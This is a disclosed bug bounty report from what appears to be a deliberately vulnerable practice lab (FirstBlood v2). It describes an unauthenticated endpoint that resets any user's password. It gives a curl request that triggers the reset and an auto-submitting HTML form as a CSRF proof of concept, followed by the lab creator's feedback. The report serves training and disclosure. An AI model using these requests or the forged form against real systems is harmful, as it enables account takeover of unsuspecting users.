FirstBlood-#386 — Any user can update another's user password via /drpanel/drapi/editpassword.php endpoint
This issue was discovered on FirstBlood v2
On 2021-10-25, panya 
Level 7
reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Steps to reproduce:
- Register a doctor (e.g. with a name
admin and test as an invitation code).
- Don't login with the provided credentials.
- Update the user password via this request:
curl -X POST 'https://579a3c7897af-panya.a.firstbloodhackers.com/drpanel/drapi/editpassword.php' --data-raw 'username=admin'
it works for any user and returns the newly generated password of the provided username user.
Password updated - s3mKUOhRTFvEo6Z
Actual result:
The password of the admin user will be updated to s3mKUOhRTFvEo6Z. An attacker could login with this password and take over the account.
Expected result:
The /drpanel/drapi/editpassword.php endpoint should properly validate user role and should be accessible only for admins.
UPDATE:
I'm not sure if it is a different bug or not, but this endpoint also doesn't have any CSRF protection, it could be exploited via this basic PoC:
<body onload="document.forms[0].submit()">
<form method="post" action="https://579a3c7897af-panya.a.firstbloodhackers.com/drpanel/drapi/editpassword.php">
<input type="hidden" name="username" value="admin">
</form>
</body>
By visiting a html page with this code, admin user's password will be updated to a newly generated value.
P1 CRITICAL
Endpoint: /drpanel/drapi/editpassword.php
Parameter: username
Payload: admin
FirstBlood ID: 27
Vulnerability Type: Application/Business Logic
It is possible to edit the admins password (dradmin) from /drapi/editpassword as it's only looking for the username. Usernames can be enumerated when logging in as trying 'drAdmin' results in a different error. The username can also be found from FirstBlood v1.
Report Feedback
Creator & Administrator
Hi panya, nice find! The intended issue was to be able to login as 'drAdmin' which could be found from user enumeration (different error message produced), or from FirstBlood v1. However you are correct you can update any users password, but the 'admin' account doesn't actually have any special powers. drAdmin is the root admin